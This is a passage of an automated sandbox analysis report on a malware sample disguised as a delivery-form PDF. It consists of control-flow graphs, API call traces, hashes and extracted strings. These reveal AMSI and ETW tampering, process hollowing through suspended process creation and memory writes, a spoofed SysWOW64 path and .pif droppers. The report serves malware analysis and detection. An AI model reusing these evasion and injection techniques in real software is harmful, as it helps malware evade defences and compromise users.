                                                                                            • Part of subcall function 02937E3C: GetFileAttributesA.KERNEL32(00000000,?,02952A49,ScanString,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,Initialize), ref: 02937E47
                                                                                            • Part of subcall function 02937FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02952BE7,OpenSession,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,Initialize,0299137C,0295AFD8,ScanString,0299137C,0295AFD8), ref: 02937FDD
                                                                                            • Part of subcall function 0294DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DB9E), ref: 0294DB0B
                                                                                            • Part of subcall function 0294DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0294DB45
                                                                                            • Part of subcall function 0294DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0294DB72
                                                                                            • Part of subcall function 0294DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0294DB7B
                                                                                            • Part of subcall function 029487A0: LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize,029913A4,0294A77C,UacScan), ref: 029487B4
                                                                                            • Part of subcall function 029487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487CE
                                                                                            • Part of subcall function 029487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize), ref: 0294880A
                                                                                            • Part of subcall function 0294870C: LoadLibraryW.KERNEL32(amsi), ref: 02948715
                                                                                            • Part of subcall function 0294870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02948774
                                                                                          • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,0295B330), ref: 029549B7
                                                                                            • Part of subcall function 0294DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 0294DA6C
                                                                                            • Part of subcall function 0294DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DABE), ref: 0294DA82
                                                                                            • Part of subcall function 0294DA44: NtDeleteFile.NTDLL(?), ref: 0294DAA1
                                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 02954BB7
                                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 02954C0D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                          • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                          • API String ID: 3130226682-181751239
                                                                                          • Opcode ID: 06fbf96f89cce68226eb72e5fdfce98d0b4e166085560159680f60ba476741c7
                                                                                          • Instruction ID: 676bfe540a620e246a499d2e2cdc2aa5f72f2156cb3d228af3d07b07a7868921
                                                                                          • Opcode Fuzzy Hash: 06fbf96f89cce68226eb72e5fdfce98d0b4e166085560159680f60ba476741c7
                                                                                          • Instruction Fuzzy Hash: D8240775B101688FDB12EB64EC80ADE73B7FFC9314F1251E6E809A7254DA30AE818F55
                                                                                          Function 02957878 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771processthreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 5348 2957878-2957c67 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2934898 5463 2958af1-2958c74 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2934898 5348->5463 5464 2957c6d-2957e40 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2934798 call 293494c call 2934d20 call 2934d9c CreateProcessAsUserW 5348->5464 5553 2959420-295aa25 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 * 16 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 2947b98 call 294818c call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 ExitProcess 5463->5553 5554 2958c7a-2958c89 call 2934898 5463->5554 5573 2957e42-2957eb9 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 5464->5573 5574 2957ebe-2957fc9 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 5464->5574 5554->5553 5563 2958c8f-2958f62 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 294e540 call 293480c call 293494c call 29346a4 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2937e18 5554->5563 5821 2958f68-2959215 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2934d8c * 2 call 2934734 call 294dacc 5563->5821 5822 295921a-295941b call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29349a4 call 2948bb0 5563->5822 5573->5574 5674 2957fd0-29582f0 call 29349a4 call 294dc90 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 294cfa4 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 5574->5674 5675 2957fcb-2957fce 5574->5675 5989 29582f2-2958304 call 2948584 5674->5989 5990 2958309-2958aec call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 ResumeThread call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 CloseHandle call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2947ed4 call 29487a0 * 6 CloseHandle call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 5674->5990 5675->5674 5821->5822 5822->5553 5989->5990 5990->5463
                                                                                          APIs
                                                                                            • Part of subcall function 02948824: LoadLibraryA.KERNEL32(00000000,00000000,0294890B), ref: 02948858
                                                                                            • Part of subcall function 02948824: FreeLibrary.KERNEL32(74AE0000,00000000,02991388,Function_000065D8,00000004,02991398,02991388,05F5E0FF,00000040,0299139C,74AE0000,00000000,00000000,00000000,00000000,0294890B), ref: 029488EB
                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A857DC,02A85820,OpenSession,0299137C,0295AFD8,UacScan,0299137C), ref: 02957E39
                                                                                          • ResumeThread.KERNEL32(00000000,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,UacScan,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8), ref: 02958483
                                                                                          • CloseHandle.KERNEL32(00000000,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,UacScan,0299137C,0295AFD8,00000000,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C), ref: 02958602
                                                                                            • Part of subcall function 029487A0: LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize,029913A4,0294A77C,UacScan), ref: 029487B4
                                                                                            • Part of subcall function 029487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487CE
                                                                                            • Part of subcall function 029487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize), ref: 0294880A
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0299137C,0295AFD8,UacInitialize,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,UacScan,0299137C), ref: 029589F4
                                                                                            • Part of subcall function 02937E18: GetFileAttributesA.KERNEL32(00000000,?,0294F8CC,ScanString,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,UacScan,0299137C,0295AFD8,UacInitialize), ref: 02937E23
                                                                                            • Part of subcall function 0294DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DB9E), ref: 0294DB0B
                                                                                            • Part of subcall function 0294DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0294DB45
                                                                                            • Part of subcall function 0294DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0294DB72
                                                                                            • Part of subcall function 0294DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0294DB7B
                                                                                            • Part of subcall function 0294818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02948216), ref: 029481F8
                                                                                          • ExitProcess.KERNEL32(00000000,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,Initialize,0299137C,0295AFD8,00000000,00000000,00000000,ScanString,0299137C,0295AFD8), ref: 0295AA25
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
                                                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                          • API String ID: 1548959583-1225450241
                                                                                          • Opcode ID: a31a57e184ed32cd59cea298341b12915723072c9a843457fd1372bebf8e09a8
                                                                                          • Instruction ID: 2d09377c997a2307dcac43e4d2159cf7dd07f97f78346d0bf5eeeea58a14d2e1
                                                                                          • Opcode Fuzzy Hash: a31a57e184ed32cd59cea298341b12915723072c9a843457fd1372bebf8e09a8
                                                                                          • Instruction Fuzzy Hash: 89430875B101288BDB16EB64ED809DE73FAFFC8314F1151E6E809AB354DA30AE858F51
                                                                                          Function 02931724 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 289sleepCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 8535 2931724-2931736 8536 2931968-293196d 8535->8536 8537 293173c-293174c 8535->8537 8540 2931973-2931984 8536->8540 8541 2931a80-2931a83 8536->8541 8538 29317a4-29317ad 8537->8538 8539 293174e-293175b 8537->8539 8538->8539 8548 29317af-29317bb 8538->8548 8544 2931774-2931780 8539->8544 8545 293175d-293176a 8539->8545 8546 2931986-29319a2 8540->8546 8547 2931938-2931945 8540->8547 8542 2931684-29316ad VirtualAlloc 8541->8542 8543 2931a89-2931a8b 8541->8543 8549 29316df-29316e5 8542->8549 8550 29316af-29316dc call 2931644 8542->8550 8554 2931782-2931790 8544->8554 8555 29317f0-29317f9 8544->8555 8551 2931794-29317a1 8545->8551 8552 293176c-2931770 8545->8552 8556 29319b0-29319bf 8546->8556 8557 29319a4-29319ac 8546->8557 8547->8546 8553 2931947-293195b Sleep 8547->8553 8548->8539 8558 29317bd-29317c9 8548->8558 8550->8549 8553->8546 8565 293195d-2931964 Sleep 8553->8565 8562 29317fb-2931808 8555->8562 8563 293182c-2931836 8555->8563 8559 29319c1-29319d5 8556->8559 8560 29319d8-29319e0 8556->8560 8566 2931a0c-2931a22 8557->8566 8558->8539 8561 29317cb-29317de Sleep 8558->8561 8559->8566 8568 29319e2-29319fa 8560->8568 8569 29319fc-29319fe call 29315cc 8560->8569 8561->8539 8567 29317e4-29317eb Sleep 8561->8567 8562->8563 8570 293180a-293181e Sleep 8562->8570 8571 29318a8-29318b4 8563->8571 8572 2931838-2931863 8563->8572 8565->8547 8573 2931a24-2931a32 8566->8573 8574 2931a3b-2931a47 8566->8574 8567->8538 8576 2931a03-2931a0b 8568->8576 8569->8576 8570->8563 8578 2931820-2931827 Sleep 8570->8578 8584 29318b6-29318c8 8571->8584 8585 29318dc-29318eb call 29315cc 8571->8585 8579 2931865-2931873 8572->8579 8580 293187c-293188a 8572->8580 8573->8574 8581 2931a34 8573->8581 8582 2931a49-2931a5c 8574->8582 8583 2931a68 8574->8583 8578->8562 8579->8580 8589 2931875 8579->8589 8590 29318f8 8580->8590 8591 293188c-29318a6 call 2931500 8580->8591 8581->8574 8592 2931a5e-2931a63 call 2931500 8582->8592 8593 2931a6d-2931a7f 8582->8593 8583->8593 8586 29318ca 8584->8586 8587 29318cc-29318da 8584->8587 8594 29318fd-2931936 8585->8594 8598 29318ed-29318f7 8585->8598 8586->8587 8587->8594 8589->8580 8590->8594 8591->8594 8592->8593
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,?,02932000), ref: 029317D0
                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,02932000), ref: 029317E6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID: 0`
                                                                                          • API String ID: 3472027048-3339448193
                                                                                          • Opcode ID: 717055ff5cb5ce53a429bc65fc91df9714b4afd073422acc12a225a3205c20dc
                                                                                          • Instruction ID: 77a36f2d757f0c262c704fc0adb4457561cbb6601d114fe03a642c4753aade45
                                                                                          • Opcode Fuzzy Hash: 717055ff5cb5ce53a429bc65fc91df9714b4afd073422acc12a225a3205c20dc
                                                                                          • Instruction Fuzzy Hash: B3B16976A053418FE716CF28E890375BBE1FB85324F0C86AEE58E8B3A5C7709451CB94
                                                                                          Function 02931A8C Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 175sleepCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 10477 2931a8c-2931a9b 10478 2931aa1-2931aa5 10477->10478 10479 2931b6c-2931b6f 10477->10479 10482 2931aa7-2931aae 10478->10482 10483 2931b08-2931b11 10478->10483 10480 2931b75-2931b7f 10479->10480 10481 2931c5c-2931c60 10479->10481 10485 2931b81-2931b8d 10480->10485 10486 2931b3c-2931b49 10480->10486 10489 2931c66-2931c6b 10481->10489 10490 29316e8-293170b call 2931644 VirtualFree 10481->10490 10487 2931ab0-2931abb 10482->10487 10488 2931adc-2931ade 10482->10488 10483->10482 10484 2931b13-2931b27 Sleep 10483->10484 10484->10482 10492 2931b2d-2931b38 Sleep 10484->10492 10494 2931bc4-2931bd2 10485->10494 10495 2931b8f-2931b92 10485->10495 10486->10485 10493 2931b4b-2931b5f Sleep 10486->10493 10496 2931ac4-2931ad9 10487->10496 10497 2931abd-2931ac2 10487->10497 10498 2931af3 10488->10498 10499 2931ae0-2931af1 10488->10499 10505 2931716 10490->10505 10506 293170d-2931714 10490->10506 10492->10483 10493->10485 10504 2931b61-2931b68 Sleep 10493->10504 10502 2931b96-2931b9a 10494->10502 10503 2931bd4-2931bd9 call 29314c0 10494->10503 10495->10502 10500 2931af6-2931b03 10498->10500 10499->10498 10499->10500 10500->10480 10508 2931bdc-2931be9 10502->10508 10509 2931b9c-2931ba2 10502->10509 10503->10502 10504->10486 10510 2931719-2931723 10505->10510 10506->10510 10508->10509 10512 2931beb-2931bf2 call 29314c0 10508->10512 10513 2931bf4-2931bfe 10509->10513 10514 2931ba4-2931bc2 call 2931500 10509->10514 10512->10509 10516 2931c00-2931c28 VirtualFree 10513->10516 10517 2931c2c-2931c59 call 2931560 10513->10517
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,?), ref: 02931B17
                                                                                          • Sleep.KERNEL32(0000000A,00000000,?), ref: 02931B31
                                                                                          Strings
